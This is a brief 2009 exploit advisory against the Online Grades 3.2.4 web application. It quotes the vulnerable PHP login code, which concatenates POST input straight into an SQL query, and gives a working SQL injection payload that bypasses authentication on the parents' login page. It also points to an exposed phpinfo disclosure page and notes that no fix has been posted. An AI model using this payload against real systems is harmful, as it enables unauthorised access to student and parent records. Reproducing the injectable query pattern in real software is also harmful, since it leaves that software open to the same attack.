Online Grades 3.2.4 (Auth Bypass) SQL Injection Vulnerability

2009-02-03 08:32:43

#########################################################################################

[0x01] Informations:
Script : Online Grades 3.2.4
Download : http://www.onlinegrades.org
Vulnerability : Auth Bypass - Php Info Disclosure
Author : x0r
Contact : [email protected] \ [email protected]
Website : NULL

#########################################################################################

[0x02] Bug: /parents/login.php

$username = $_POST['uname']; $pword = $_POST['pass'];
$mysql_query = "SELECT * from PARENTS where client_id = '$username' and
client_pw = '$pword';";

#########################################################################################

[0x03] Exploit:
Exploit: [validemail] ' or ' 1=1--

Php Info: /includes/phpinfo.php

#########################################################################################

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.